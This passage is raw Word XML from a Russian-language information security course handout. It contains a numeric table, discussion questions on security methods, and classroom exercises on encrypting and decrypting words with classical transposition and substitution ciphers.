              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="40"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="260" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="60"/>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11</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13</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16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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>24</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400" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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18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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="8"/>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23</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21</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32</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23</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highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>33</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25</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gridSpan w:val="6"/>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32</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16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31</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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>30</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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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6</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21</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23</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21</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00" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>4</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2</w:t>
            </w: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42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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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13</w:t>
            </w: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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="260" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>32</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27</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15</w:t>
            </w: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w w:val="79"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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3</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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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24</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22</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26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>1</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24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14</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42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22</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14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00" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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14</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16</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28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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>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24</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14</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>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42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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>3</w:t>
            </w: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bl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="275" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-1"/>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вопросы по теме</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="26" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Методы обеспечения информационной безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Средства обеспечения информационной безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Криптографическое обеспечение информационной безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Организационное обеспечение информационной безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="251" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-1"/>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задания 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="23" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="722"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="722" w:hanging="362"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Зашифровать следующие сообщения методом перестановки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="3142"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ИНФОРМАЦИОННЫЕ СИСТЕМЫ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="3602"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ТЕЛЕКОММУНИКАЦИИ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="702"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Зашифровать следующие сообщения методом подстановки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="3342"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>КОНФИДЕНЦИАЛЬНОСТЬ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="3942"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ШИФРОВАНИЕ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="3862"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>КРИПТОГРАФИЯ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="702"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Расшифровать следующее сообщение методом перестановки без ключа:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="3462"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ЕЫНЬЛАНОСРЕП НАДЕЫН</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="250" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="722"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="722" w:hanging="362"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Расшифровать следующий код методом перестановки,  при известном ключе -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="26" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>РАДИАТОР:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="851" w:right="840" w:bottom="474" w:left="1418" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="0" w:equalWidth="0">
            <w:col w:w="9642"/>
          </w:cols>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="209" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="255" w:lineRule="auto"/>
        <w:ind w:left="2" w:right="2920"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>сеиве неави ежвро еуррк _ о_см т_тма же__с щемтр рмдры смввя ибяье аяаев асммй о_о__ _а__ь нВо__ в_рд_ мра_ы повяя _дВжи уВсив _н_ее опмря яьнья те</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="255" w:lineRule="auto"/>
        <w:ind w:left="2" w:right="2920"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="851" w:right="840" w:bottom="474" w:left="1418" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="0" w:equalWidth="0">
            <w:col w:w="9642"/>
          </w:cols>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="page16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>рврчр р_трк ряяья аяаеи яьясе аеееу вреае тмтмв мшром тмьуи вьрья ьписВ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="22" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pP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иваВз исВав еб_р а__ л _м___ т_тмт ___я</w:t>
      </w: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ровяе р__ок емро_ тятмт _ымер н_ьят _еврс маквб амаен оимае аясар имятм</w:t>
      </w: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ятйс_ __ааи ят_би утбВт _лрбь ис_ри вляяе ипВзт __ьВн _ксъ_ ьяьрв нмаио</w:t>
      </w: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__ьо</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="238" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
